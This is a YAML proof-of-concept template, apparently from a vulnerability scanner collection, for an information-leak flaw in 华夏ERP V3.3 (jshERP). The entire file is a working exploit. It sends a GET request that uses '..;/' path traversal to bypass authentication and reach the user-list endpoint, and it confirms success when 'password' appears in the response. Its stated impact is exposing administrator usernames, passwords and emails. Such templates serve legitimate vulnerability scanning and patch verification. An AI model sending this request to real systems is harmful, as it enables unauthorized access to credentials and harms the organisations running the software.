Poc_Scanner/poc/OA-Poc/huaxiaERP-InfoLeak.yaml
2024-10-09 15:15:50 +08:00

27 lines
916 B
YAML

keyword: 华夏ERP
name: 华夏ERP信息泄漏漏洞
description: | # 下一行可填写漏洞描述
华夏ERPV3.3存在信息泄漏漏洞,可获取用户敏感信息。
requests: # 为空代表默认或者不启用
path: "/jshERP-boot/platformConfig/getPlatform/..;/..;/..;/jshERP-boot/user/getAllList"
method: GET
headers:
Cookie:
X-Forwarded-For:
body-raw: |- # 如果需要发送请求体,在下一行开始填写
response:
path: "" # 不填则默认接收此请求的响应包
status-code: 200
body: "password" # 此处可填写响应体中确认漏洞存在的关键字或者其他信息
time: # 此处填写响应包响应时间,默认不启用
headers:
Server:
Content-type:
Content-length:
Date:
Connection:
impact: | # 下一行可填写漏洞影响
可获取用户敏感信息(如系统管理员用户名+密码+邮箱等)。